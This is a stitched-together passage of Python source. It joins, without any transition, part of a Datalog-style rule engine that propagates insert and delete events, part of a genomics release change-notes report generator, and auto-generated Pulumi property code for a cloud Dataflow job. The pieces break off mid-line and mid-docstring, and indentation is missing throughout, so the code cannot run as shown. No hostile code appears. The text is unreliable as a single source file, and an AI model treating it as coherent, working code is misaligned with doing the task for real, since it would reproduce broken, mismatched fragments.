"""Insertion/deletion of FORMULA can require communication
with included theories. Also, rules are a bit different
in that they generate additional events that we want
to process either before the rule is deleted or after
it is inserted. PROCESS_QUEUE is similar but assumes
that only the data will cause propagations and ignores
included theories.
"""
# Note: all included theories must define MODIFY
if event.insert:
text = "Insert"
else:
text = "Delete"
formula = event.formula
if formula.is_atom():
self.log(formula.tablename(),
"compute/enq: atom {}".format(str(formula)))
assert not self.is_view(formula.table), \
"Cannot directly modify tables computed from other tables"
self.log(formula.table, "{}: {}".format(text, str(formula)))
for theory in self.includes:
changes = theory.modify(event)
self.log(formula.table, "Includee {} returned {} ".format(
theory.abbr, iterstr(changes)))
# an atomic change can only produce atomic changes
for change in changes:
self.enqueue(change)
return []
else:
# rules do not need to talk to included theories because they
# only generate events for views
# need to eliminate self-joins here so that we fill all
# the tables introduced by self-join elimination.
for rule in DeltaRuleTheory.eliminate_self_joins([formula]):
DeltaRuleTheory.reorder(rule)
bindings = self.top_down_evaluation(
rule.variables(), rule.body)
self.log(rule.tablename(),
"new bindings after top-down: " + iterstr(bindings))
new_event = Event(formula=rule, insert=event.insert,
target=event.target)
if event.insert:
# insert rule and then process data so that
# we know that data is for a view
self.enqueue(new_event)
self.process_new_bindings(bindings, rule.head,
event.insert, rule)
else:
# process data and then delete the rule so
# that we know that data is for a view
self.process_new_bindings(bindings, rule.head,
event.insert, rule)
self.enqueue(new_event)
return []
def enqueue(self, event):
self.log(event.tablename(), "Enqueueing: {}".format(str(event)))
self.queue.enqueue(event)
def process_queue(self):
"""Data and rule propagation routine.
Returns list of events that were not noops
"""
self.log(None, "Processing queue")
history = []
while len(self.queue) > 0:
event = self.queue.dequeue()
self.log(event.tablename(), "Dequeued " + str(event))
if compile.is_regular_rule(event.formula):
history.extend(self.delta_rules.modify(event))
else:
self.propagate(event)
# if self.is_view(event.formula.table):
history.extend(self.database.modify(event))
self.log(event.tablename(), "History: " + iterstr(history))
return history
def propagate(self, event):
"""Computes events generated by EVENT and the DELTA_RULES,
and enqueues them.
"""
self.log(event.formula.table,
"Processing event: {}".format(str(event)))
applicable_rules = self.delta_rules.rules_with_trigger(
event.formula.table)
if len(applicable_rules) == 0:
self.log(event.formula.table, "No applicable delta rule")
for delta_rule in applicable_rules:
self.propagate_rule(event, delta_rule)
def propagate_rule(self, event, delta_rule):
"""Compute and enqueue new events generated by EVENT and DELTA_RULE.
"""
self.log(event.formula.table,
"Processing event {} with rule {}".format(
str(event), str(delta_rule)))
# compute tuples generated by event (either for insert or delete)
# print "event: {}, event.tuple: {},
# event.tuple.rawtuple(): {}".format(
# str(event), str(event.tuple), str(event.tuple.raw_tuple()))
# binding_list is dictionary
# Save binding for delta_rule.trigger; throw away binding for event
# since event is ground.
binding = self.new_bi_unifier()
assert compile.is_literal(delta_rule.trigger)
assert compile.is_literal(event.formula)
undo = self.bi_unify(delta_rule.trigger, binding,
event.formula, self.new_bi_unifier())
if undo is None:
return
self.log(event.formula.table,
"binding list for event and delta-rule trigger: {}".format(
str(binding)))
bindings = self.top_down_evaluation(
delta_rule.variables(), delta_rule.body, binding)
self.log(event.formula.table, "new bindings after top-down: {}".format(
",".join([str(x) for x in bindings])))
if delta_rule.trigger.is_negated():
insert_delete = not event.insert
else:
insert_delete = event.insert
self.process_new_bindings(bindings, delta_rule.head,
insert_delete, delta_rule.original)
def process_new_bindings(self, bindings, atom, insert, original_rule):
"""For each of BINDINGS, apply to ATOM, and enqueue it as an insert if
INSERT is True and as a delete otherwise.
"""
# for each binding, compute generated tuple and group bindings
# by the tuple they generated
new_atoms = {}
for binding in bindings:
new_atom = atom.plug(binding)
if new_atom not in new_atoms:
new_atoms[new_atom] = []
new_atoms[new_atom].append(Database.Proof(
binding, original_rule))
self.log(atom.table, "new tuples generated: " + iterstr(new_atoms))
# enqueue each distinct generated tuple, recording appropriate bindings
for new_atom in new_atoms:
# self.log(event.table,
# "new_tuple {}: {}".format(str(new_tuple),
# str(new_tuples[new_tuple])))
# Only enqueue if new data.
# Putting the check here is necessary to support recursion.
self.enqueue(Event(formula=new_atom,
proofs=new_atoms[new_atom],
insert=insert))
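# Illustrative (hypothetical) shape of the grouping above: given bindings
# [{x: 1}, {x: 1}, {x: 2}] and head atom p(x), new_atoms would map
# p(1) -> two Database.Proof objects and p(2) -> one, and exactly one Event
# per distinct plugged atom is enqueued.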
def is_view(self, x):
"""Return True if the table X is defined by the theory."""
return self.delta_rules.is_view(x)
def is_known(self, x):
"""Return True if this theory has any rule mentioning table X."""
return self.delta_rules.is_known(x)
def base_tables(self):
"""Return the list of tables that are mentioned in the rules but
for which there are no rules with those tables in the head.
"""
return self.delta_rules.base_tables()
def top_down_th(self, context, caller):
return self.database.top_down_th(context, caller)
def content(self, tablenames=None):
return self.database.content(tablenames=tablenames)
# class MaterializedViewTheory(MaterializedRuleTheory):
# """A MaterializedRuleTheory where all tables are views
# of its included theories. """
# # Not sure this theory and MaterializedRuleTheory
# # should be related via inheritance.
# # MaterializedRuleTheory ignores included
# # theories on insert/delete. This theory relies on other theories
# # to compute its base tables. No way for recursive rules to span
# # the two theories.
# # Internally, views/base_tables are defined as usual so that we can
# # ignore events other than those for base_tables.
# # Can only 'include'
# # MaterializedViewTheory and MaterializedRuleTheory (for now).
# def insert(self, formula):
# """Insert FORMULA. Returns True iff the theory changed. """
# assert (isinstance(formula, compile.Atom) or
# isinstance(formula, compile.Rule)), \
# "Insert requires a formula"
# return self.modify(formula, is_insert=True)
# def delete(self, formula):
# """Delete FORMULA. Returns True iff the theory changed. """
# assert (isinstance(formula, compile.Atom) or
# isinstance(formula, compile.Rule)), \
# "Delete requires a formula"
# return self.modify(formula, is_insert=False)
# def modify(self, formula, is_insert=True):
# """Modifies contents of theory to insert/delete FORMULA.
# Returns list of changes to this theory and all included theories.
# """
# # send modification down to other theories and get events back
# changed_rules = set()
# events = set()
# for theory in self.includes:
# changed_rules |= theory.enqueue_events(formula,
# is_insert=is_insert)
# events |= theory.process_queue() # doesn't include noops
# # enqueue events on my base tables, process them, and return
# # the results
# base_tables = self.base_tables()
# for event in events:
# if event.formula.table in base_tables:
# self.queue.enqueue(event)
# local_events = self.process_queue()
# return changed_rules + (events | local_events)
##############################################################################
##
output, totalsize, "Table")
self.totalTableSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(pushFiles, self.releasePath)), output, totalsize, "Files")
self.totalFilesSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(pushGbdbs, self.releasePath)), output, totalsize, "Gbdbs")
self.totalGbdbsSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(newSupp, self.releasePath)), output, totalsize, "Supplemental")
self.totalSupplementalSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(additionalList, self.releasePath)), output, totalsize, "Other")
self.totalAdditionalSize = strout
(output, totalsize, strout) = self.__printSize(totalsize, output, 0, "Total")
self.totalEverythingSize = strout
output.append("")
return output
def __addMissingToReport(self, missing, type, path=None):
output = []
if missing:
output.append("%s that dropped between releases (%s):" % (type, len(missing)))
output.extend(ucscUtils.printIter(missing, path))
output.append("\n")
return output
def __checkAtticNotInTrackDb(self):
errors = []
atticTables = self.newMdb.filter(lambda s: s['objType'] == 'table' and 'attic' in s, lambda s: s['tableName'])
for i in atticTables:
foo = self.trackDb.filter(lambda s: s['track'] == i, lambda s: s['track'])
if foo:
errors.append("trackDb: %s is attic in metaDb, has an active trackDb entry" % i)
return errors
def printReport(self, args, c):
(totalFiles, newGbdbSet, newTableSet, additionalList, oldAdditionalList, oldTableSet, oldReleaseFiles, oldGbdbSet, atticSet, revokedFiles, revokedTableSet, revokedGbdbs, missingFiles, newSupplementalSet, oldSupplementalSet, pushTables, pushFiles, pushGbdbs, newSupp) = (self.totalFiles, self.newGbdbSet, self.newTableSet, self.additionalList, self.oldAdditionalList, self.oldTableSet, self.oldTotalFiles, self.oldGbdbSet, self.atticSet, self.revokedFiles, self.revokedTableSet, self.revokedGbdbs, self.missingFiles, self.newSupplementalSet, self.oldSupplementalSet, self.pushTables, self.pushFiles, self.pushGbdbs, self.newSupp)
#the groups here need to be predefined; these were copied and pasted after working out what they were
sep = "\n"
output = []
#maths
allTables = newTableSet | oldTableSet | revokedTableSet
untouchedTables = oldTableSet & newTableSet
allFiles = totalFiles | oldReleaseFiles | revokedFiles
newFiles = pushFiles - revokedFiles
untouchedFiles = (totalFiles & oldReleaseFiles) - revokedFiles
filesNoRevoke = totalFiles - revokedFiles
allGbdbs = newGbdbSet | oldGbdbSet | revokedGbdbs
untouchedGbdbs = (newGbdbSet & oldGbdbSet) - revokedGbdbs
allSupp = newSupplementalSet | oldSupplementalSet
removedSupp = oldSupplementalSet - newSupplementalSet
untouchedSupp = oldSupplementalSet & newSupplementalSet
allOther = additionalList | oldAdditionalList
removedOther = oldAdditionalList - additionalList
output.extend(self.__qaHeader(output, newTableSet, filesNoRevoke, newGbdbSet, newSupp, oldSupplementalSet, additionalList, revokedTableSet, revokedFiles, revokedGbdbs, pushFiles, pushGbdbs, args, c))
output.extend(self.__printSection(pushTables, untouchedTables, revokedTableSet, allTables, "tables", 0, args['summary']))
output.extend(self.__printSection(pushFiles, untouchedFiles, revokedFiles, allFiles, "download", self.releasePath, args['summary']))
output.extend(self.__printSection(pushGbdbs, untouchedGbdbs, revokedGbdbs, allGbdbs, "gbdbs", self.gbdbPath, args['summary']))
output.extend(self.__printSection(newSupp, untouchedSupp, removedSupp, allSupp, "supplemental", self.releasePath, args['summary']))
#These attributes are the critical ones used by qaInit; others could potentially use them also.
otherprint = len(allOther)
if otherprint:
output.append("\n")
output.append("OTHER FILES:")
output.append("New: %s" % len(additionalList))
output.append("Revoked/Replace: %s" % len(removedOther))
output.append("Total: %s" % len(allOther))
if otherprint and not args['summary']:
output.append("")
output.append("New Other Files (%s):" % len(additionalList))
output.extend(sorted(list(self.newOthers)))
output.append("")
output.append("Revoked Other Files (%s):" % len(removedOther))
output.extend(ucscUtils.printIter((removedOther), self.releasePath))
output.append("\n")
output.extend(self.__addMissingToReport(missingFiles, "Files", self.releasePathOld))
output.append("\n")
output.extend(self.__addMissingToReport(self.droppedTables, "Tables"))
output.append("\n")
if self.atticSet:
if self.newInAttic:
output.append("New Attic Objects (%s):" % len(self.newInAttic))
output.extend(ucscUtils.printIter((self.newInAttic)))
output.append("\n")
if self.stillInAttic:
output.append("Untouched Attic Objects (%s):" % len(self.stillInAttic))
output.extend(ucscUtils.printIter((self.stillInAttic)))
output.append("\n")
if self.noMoreAttic:
output.append("Removed from Attic Objects (%s):" % len(self.noMoreAttic))
output.extend(ucscUtils.printIter((self.noMoreAttic)))
output.append("\n")
output.append("\n")
if not args['ignore']:
output.append("No Errors")
else:
output.append("The counts here were generated by ignoring errors, they may not be correct")
return output
def __printSectionOne(self, output, set, title):
output = []
if set:
output.append("%s (%s):" % (title, len(set)))
output.extend(sorted(list(set)))
else:
return output
output.append("\n")
return output
def printReportOne(self, args, c):
(totalFiles, revokedFiles, newGbdbSet, revokedGbdbs, newTableSet, revokedTables, additionalList, atticSet, newSupplementalSet, tableSize) = (self.totalFiles, self.revokedFiles, self.newGbdbSet, self.revokedGbdbs, self.newTableSet, self.revokedTableSet, self.additionalList, self.atticSet, self.newSupplementalSet, self.tableSize)
output = []
newTables = newTableSet - revokedTables
newFiles = totalFiles - revokedFiles
newGbdbs = newGbdbSet - revokedGbdbs
output.extend(self.__qaHeader(output, newTables, newFiles, newGbdbSet, newSupplementalSet, set(), additionalList, revokedTables, revokedFiles, revokedGbdbs, totalFiles, newGbdbSet, args, c))
self.newTables = set(newTables)
self.newFiles = set(ucscUtils.printIter(newFiles, self.releasePath))
self.newGbdbs = set(ucscUtils.printIter(newGbdbs, self.gbdbPath))
self.newSupplemental = set(ucscUtils.printIter(newSupplementalSet, self.releasePath))
self.newOthers = set(ucscUtils.printIter(additionalList, self.releasePath))
if not args['summary']:
output.append("")
output.extend(self.__printSectionOne(output, self.newTables, "New Tables"))
output.extend(self.__printSectionOne(output, self.newFiles, "New Download Files"))
output.extend(self.__printSectionOne(output, self.newGbdbs, "New Gbdb Files"))
output.extend(self.__printSectionOne(output, self.newSupplemental, "New Supplemental Files"))
output.extend(self.__printSectionOne(output, self.newOthers, "New Other Files"))
output.extend(self.__printSectionOne(output, ucscUtils.printIter(revokedTables, 0), "Revoked Tables"))
output.extend(self.__printSectionOne(output, ucscUtils.printIter(revokedFiles, self.releasePath), "Revoked Files"))
output.extend(self.__printSectionOne(output, ucscUtils.printIter(revokedGbdbs, self.gbdbPath), "Revoked Gbdbs"))
if self.atticSet:
output.append("Attic Objects")
output.extend(ucscUtils.printIter((self.atticSet), self.releasePath))
if not args['ignore']:
output.append("No Errors")
else:
output.append("The counts here were generated by ignoring errors, they may not be correct")
return output
def printErrors(self, errors, missingFiles):
errorsDict = {}
output = []
lastpart = []
for i in errors:
if not re.match(".+:.+", i):
lastpart.append(i)
continue
line = i.split(":", 1)
try:
errorsDict[line[0]].append(line[1])
except KeyError:
errorsDict[line[0]] = []
errorsDict[line[0]].append(line[1])
output.append("Errors (%s):" % len(errors))
for i in sorted(errorsDict.keys()):
output.append("%s:" % i)
for j in sorted(errorsDict[i]):
output.append("%s" % j)
output.append("\n")
if missingFiles:
output.extend(self.__addMissingToReport(missingFiles, "Files", self.releasePathOld))
output.append("\n")
if self.droppedTables:
output.extend(self.__addMissingToReport(self.droppedTables, "Tables"))
if lastpart:
output.extend(lastpart)
return output
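#Illustrative (hypothetical) behaviour of printErrors above: error strings of
#the form "category: message" are grouped by category, so
#["track: foo is active", "md5sum: bar changed"] yields a "track:" section and
#an "md5sum:" section; strings without a "category:" prefix are appended
#verbatim at the end of the report.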
def __init__(self, args):
self.releaseNew = args['releaseNew']
self.releaseOld = args['releaseOld']
self.database = args['database']
self.composite = args['composite']
self.loose = args['loose']
self.ignore = args['ignore']
self.summary = args['summary']
self.specialMdb = args['specialMdb']
self.args = args
if 'verbose' in args:
self.verbose = args['verbose']
else:
self.verbose = 0
errors = []
c = track.CompositeTrack(self.database, self.composite, None, self.specialMdb)
#sanitize arguments
if not self.releaseOld.isdigit():
self.releaseOld = 'solo'
elif int(self.releaseOld) <= 0:
self.releaseOld = 'solo'
elif int(self.releaseOld) > int(self.releaseNew):
self.releaseOld = 'solo'
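#Illustrative examples of the fallback above (hypothetical values): a
#releaseOld of "solo", "", "abc" or "0", or any releaseOld numerically greater
#than releaseNew, all force solo (single-release) mode.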
if self.verbose >= 1:
sys.stderr.write("Initializing MkChangeNotes\n")
self.releasePath = c.httpDownloadsPath + 'release' + args['releaseNew']
self.gbdbPath = "/gbdb/%s/bbi" % args['database']
self.trackDbFile = c.currentTrackDb
if not self.trackDbFile:
self.trackDb = None
errors.append("track: There is no entry in trackDb.wgEncode.ra for %s with the alpha tag" % self.composite)
else:
self.trackDb = RaFile(self.trackDbFile, "track")
if int(self.releaseNew) > 1 and str(self.releaseOld) != 'solo':
if self.verbose >= 2:
sys.stderr.write("Comparison mode\n")
self.newReleaseFiles = c.releases[int(self.releaseNew)-1]
self.oldReleaseFiles = c.releases[int(self.releaseOld)-1]
self.releasePathOld = c.httpDownloadsPath + 'release' + args['releaseOld']
self.newMdb = c.alphaMetaDb
self.oldMdb = c.publicMetaDb
if self.verbose >= 2:
sys.stderr.write("Checking for missing files\n")
#make a list of missing files
self.missingFiles = self.__checkFilesForDropped()
#filter them out of old release files
if self.verbose >= 1:
sys.stderr.write("Scanning and parsing release directories\n")
#check if all files listed in release directories have associated metaDb entries
(self.newMdb, self.revokedSet, self.revokedFiles, self.atticSet, self.newSupplementalSet, newFileErrors) = self.checkMetaDbForFiles("alpha metaDb", "new")
(self.oldMdb, self.oldRevokedSet, self.oldRevokedFiles, self.oldAtticSet, self.oldSupplementalSet, oldFileErrors) = self.checkMetaDbForFiles("public metaDb", "old")
self.expIds = set(self.newMdb.filter(lambda s: 'expId' in s, lambda s: s['expId']))
if self.verbose >= 2:
sys.stderr.write("Checking for attic files\n")
#check that attic files aren't in trackDb
if self.trackDb:
errors.extend(self.__checkAtticNotInTrackDb())
#checks to see that nothing has disappeared between public and alpha
if self.verbose >= 1:
sys.stderr.write("Checking new metaDb for missing stanzas\n")
errors.extend(self.__checkAlphaForDropped("alpha metaDb", "stanza"))
if self.verbose >=1:
sys.stderr.write("Checking file md5sums across releases\n")
errors.extend(self.__checkMd5sums())
#checks and gets tables that are present, also returns a revoked set of tables for new
if self.verbose >= 1:
sys.stderr.write("Checking table status\n")
(self.newTableSet, self.revokedTableSet, self.newMissingTables, newTableError) = self.checkTableStatus("alpha metaDb", "new")
(self.oldTableSet, spam, self.droppedTables, oldTableError) = self.checkTableStatus("public metaDb", "old")
self.newInAttic = self.atticSet - self.oldAtticSet
self.stillInAttic = self.oldAtticSet & self.atticSet
self.oldTableSet = self.oldTableSet - self.atticSet
self.noMoreAttic = self.oldAtticSet - self.atticSet
self.changedTables = self.oldTableSet - self.newTableSet - self.revokedTableSet
#same as above except for gbdbs
if self.verbose >= 1:
sys.stderr.write("Checking GBDB status\n")
(self.newGbdbSet, self.revokedGbdbs, newGbdbError) = self.getGbdbFiles("new")
(self.oldGbdbSet, eggs, oldGbdbError) = self.getGbdbFiles("old")
#remove missing files from gbdbs
self.oldGbdbSet = self.oldGbdbSet - self.missingFiles
self.oldGbdbSet = self.oldGbdbSet - self.atticSet
self.changedGbdbs = self.oldGbdbSet - self.newGbdbSet - self.revokedGbdbs
for i in self.missingFiles:
if i in self.oldReleaseFiles:
del self.oldReleaseFiles[i]
#fill in the errors
errors.extend(newFileErrors)
errors.extend(oldFileErrors)
errors.extend(newTableError)
errors.extend(oldTableError)
errors.extend(newGbdbError)
errors.extend(oldGbdbError)
if self.changedTables:
errors.append("These tables were tables in the old release, but are no longer tables in the new release:")
errors.extend(list(self.changedTables))
if self.changedGbdbs:
errors.append("These GBDBs were GBDB tables in the old release, but are no longer GBDB tables in the new release:")
errors.extend(list(self.changedGbdbs))
#for ease of typing
totalFiles = set(self.newReleaseFiles)
oldTotalFiles = set(self.oldReleaseFiles)
#these could honestly be moved earlier, get a file list processing section or something
#they clean special files out and separate the master files list into the 3 required
#ones: wgEncode, supplemental and additional.
self.totalFiles = self.__cleanSpecialFiles(totalFiles)
self.oldTotalFiles = self.__cleanSpecialFiles(oldTotalFiles)
(self.oldTotalFiles, self.additionalList, self.oldAdditionalList, self.totalFiles) = self.__separateOutAdditional()
#get the stuff you need to push
self.pushTables = set(sorted((self.newTableSet - self.oldTableSet)))
self.pushFiles = set(sorted((self.totalFiles - self.oldTotalFiles)))
self.pushGbdbs = set(sorted((self.newGbdbSet - self.oldGbdbSet)))
self.newSupp = self.newSupplementalSet - self.oldSupplementalSet
self.newTables = set(self.pushTables)
self.newFiles = set(ucscUtils.printIter(self.pushFiles, self.releasePath))
self.newGbdbs = set(ucscUtils.printIter(self.pushGbdbs, self.gbdbPath))
self.newSupplemental = set(ucscUtils.printIter(self.newSupp, self.releasePath))
self.newOthers = set(ucscUtils.printIter(self.additionalList, self.releasePath))
self.fullFiles = sorted(self.totalFiles - self.revokedFiles)
self.fullTables = self.oldTableSet & self.newTableSet
self.errors = errors
#don't append the report to output unless the ignore option is on or there are no errors
#module mode doesn't generate output by default
if self.verbose >= 1:
sys.stderr.write("Creating report\n")
If the [subnetwork is located in a Shared VPC network](https://cloud.google.com/dataflow/docs/guides/specifying-networks#shared), you must use the complete URL. For example `"googleapis.com/compute/v1/projects/PROJECT_ID/regions/REGION/subnetworks/SUBNET_NAME"`
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@property
@pulumi.getter(name="transformNameMapping")
def transform_name_mapping(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Only applicable when updating a pipeline. Map of transform name prefixes of the job to be replaced with the corresponding name prefixes of the new job. This field is not used outside of update.
"""
return pulumi.get(self, "transform_name_mapping")
@transform_name_mapping.setter
def transform_name_mapping(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "transform_name_mapping", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The zone in which the created job should run. If it is not provided, the provider zone is used.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class _JobState:
def __init__(__self__, *,
additional_experiments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_streaming_engine: Optional[pulumi.Input[bool]] = None,
ip_configuration: Optional[pulumi.Input[str]] = None,
job_id: Optional[pulumi.Input[str]] = None,
kms_key_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
machine_type: Optional[pulumi.Input[str]] = None,
max_workers: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
on_delete: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
service_account_email: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
temp_gcs_location: Optional[pulumi.Input[str]] = None,
template_gcs_path: Optional[pulumi.Input[str]] = None,
transform_name_mapping: Optional[pulumi.Input[Mapping[str, Any]]] = None,
type: Optional[pulumi.Input[str]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Job resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_experiments: List of experiments that should be used by the job. An example value is `["enable_stackdriver_agent_metrics"]`.
:param pulumi.Input[bool] enable_streaming_engine: Enable/disable the use of [Streaming Engine](https://cloud.google.com/dataflow/docs/guides/deploying-a-pipeline#streaming-engine) for the job. Note that Streaming Engine is enabled by default for pipelines developed against the Beam SDK for Python v2.21.0 or later when using Python 3.
:param pulumi.Input[str] ip_configuration: The configuration for VM IPs. Options are `"WORKER_IP_PUBLIC"` or `"WORKER_IP_PRIVATE"`.
:param pulumi.Input[str] job_id: The unique ID of this job.
:param pulumi.Input[str] kms_key_name: The name for the Cloud KMS key for the job. Key format is: `projects/PROJECT_ID/locations/LOCATION/keyRings/KEY_RING/cryptoKeys/KEY`
:param pulumi.Input[Mapping[str, Any]] labels: User labels to be specified for the job. Keys and values should follow the restrictions
specified in the [labeling restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions) page.
**NOTE**: Google-provided Dataflow templates often provide default labels that begin with `goog-dataflow-provided`.
Unless explicitly set in config, these labels will be ignored to prevent diffs on re-apply.
:param pulumi.Input[str] machine_type: The machine type to use for the job.
:param pulumi.Input[int] max_workers: The number of workers permitted to work on the job. More workers may improve processing speed at additional cost.
:param pulumi.Input[str] name: A unique name for the resource, required by Dataflow.
:param pulumi.Input[str] network: The network to which VMs will be assigned. If it is not provided, "default" will be used.
:param pulumi.Input[str] on_delete: One of "drain" or "cancel". Specifies behavior of deletion during `pulumi destroy`. See above note.
:param pulumi.Input[Mapping[str, Any]] parameters: Key/Value pairs to be passed to the Dataflow job (as used in the template).
:param pulumi.Input[str] project: The project in which the resource belongs. If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The region in which the created job should run.
:param pulumi.Input[str] service_account_email: The Service Account email used to create the job.
:param pulumi.Input[str] state: The current state of the resource, selected from the [JobState enum](https://cloud.google.com/dataflow/docs/reference/rest/v1b3/projects.jobs#Job.JobState)
:param pulumi.Input[str] subnetwork: The subnetwork to which VMs will be assigned. Should be of the form "regions/REGION/subnetworks/SUBNETWORK". If the [subnetwork is located in a Shared VPC network](https://cloud.google.com/dataflow/docs/guides/specifying-networks#shared), you must use the complete URL. For example `"googleapis.com/compute/v1/projects/PROJECT_ID/regions/REGION/subnetworks/SUBNET_NAME"`
:param pulumi.Input[str] temp_gcs_location: A writeable location on GCS for the Dataflow job to dump its temporary data.
:param pulumi.Input[str] template_gcs_path: The GCS path to the Dataflow job template.
:param pulumi.Input[Mapping[str, Any]] transform_name_mapping: Only applicable when updating a pipeline. Map of transform name prefixes of the job to be replaced with the corresponding name prefixes of the new job. This field is not used outside of update.
:param pulumi.Input[str] type: The type of this job, selected from the [JobType enum](https://cloud.google.com/dataflow/docs/reference/rest/v1b3/projects.jobs#Job.JobType)
:param pulumi.Input[str] zone: The zone in which the created job should run. If it is not provided, the provider zone is used.
"""
if additional_experiments is not None:
pulumi.set(__self__, "additional_experiments", additional_experiments)
if enable_streaming_engine is not None:
pulumi.set(__self__, "enable_streaming_engine", enable_streaming_engine)
if ip_configuration is not None:
pulumi.set(__self__, "ip_configuration", ip_configuration)
if job_id is not None:
pulumi.set(__self__, "job_id", job_id)
if kms_key_name is not None:
pulumi.set(__self__, "kms_key_name", kms_key_name)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if machine_type is not None:
pulumi.set(__self__, "machine_type", machine_type)
if max_workers is not None:
pulumi.set(__self__, "max_workers", max_workers)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if on_delete is not None:
pulumi.set(__self__, "on_delete", on_delete)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
if service_account_email is not None:
pulumi.set(__self__, "service_account_email", service_account_email)
if state is not None:
pulumi.set(__self__, "state", state)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
if temp_gcs_location is not None:
pulumi.set(__self__, "temp_gcs_location", temp_gcs_location)
if template_gcs_path is not None:
pulumi.set(__self__, "template_gcs_path", template_gcs_path)
if transform_name_mapping is not None:
pulumi.set(__self__, "transform_name_mapping", transform_name_mapping)
if type is not None:
pulumi.set(__self__, "type", type)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter(name="additionalExperiments")
def additional_experiments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of experiments that should be used by the job. An example value is `["enable_stackdriver_agent_metrics"]`.
"""
return pulumi.get(self, "additional_experiments")
@additional_experiments.setter
def additional_experiments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_experiments", value)
@property
@pulumi.getter(name="enableStreamingEngine")
def enable_streaming_engine(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/disable the use of [Streaming Engine](https://cloud.google.com/dataflow/docs/guides/deploying-a-pipeline#streaming-engine) for the job. Note that Streaming Engine is enabled by default for pipelines developed against the Beam SDK for Python v2.21.0 or later when using Python 3.
"""
return pulumi.get(self, "enable_streaming_engine")
@enable_streaming_engine.setter
def enable_streaming_engine(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_streaming_engine", value)
@property
@pulumi.getter(name="ipConfiguration")
def ip_configuration(self) -> Optional[pulumi.Input[str]]:
"""
The configuration for VM IPs. Options are `"WORKER_IP_PUBLIC"` or `"WORKER_IP_PRIVATE"`.
"""
return pulumi.get(self, "ip_configuration")
@ip_configuration.setter
def ip_configuration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_configuration", value)
@property
@pulumi.getter(name="jobId")
def job_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique ID of this job.
"""
return pulumi.get(self, "job_id")
@job_id.setter
def job_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_id", value)
@property
@pulumi.getter(name="kmsKeyName")
def kms_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name for the Cloud KMS key for the job. Key format is: `projects/PROJECT_ID/locations/LOCATION/keyRings/KEY_RING/cryptoKeys/KEY`
"""
return pulumi.get(self, "kms_key_name")
@kms_key_name.setter
def kms_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_name", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
User labels to be specified for the job. Keys and values should follow the restrictions
specified in the [labeling restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions) page.
**NOTE**: Google-provided Dataflow templates often provide default labels that begin with `goog-dataflow-provided`.
Unless explicitly set in config, these labels will be ignored to prevent diffs on re-apply.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="machineType")
def machine_type(self) -> Optional[pulumi.Input[str]]:
"""
The machine type to use for the job.
"""
return pulumi.get(self, "machine_type")
@machine_type.setter
def machine_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "machine_type", value)
@property
@pulumi.getter(name="maxWorkers")
def max_workers(self) -> Optional[pulumi.Input[int]]:
"""
The number of workers permitted to work on the job. More workers may improve processing speed at additional cost.
"""
return pulumi.get(self, "max_workers")
@max_workers.setter
def max_workers(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_workers", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name for the resource, required by Dataflow.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
The network to which VMs will be assigned. If it is not provided, "default" will be used.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="onDelete")
def on_delete(self) -> Optional[pulumi.Input[str]]:
"""
